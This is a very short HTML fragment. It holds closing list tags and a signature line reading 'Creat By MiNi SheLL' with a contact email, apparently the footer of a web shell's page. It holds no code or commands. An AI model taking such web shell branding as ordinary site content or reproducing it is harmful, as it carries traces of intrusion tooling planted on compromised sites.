</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com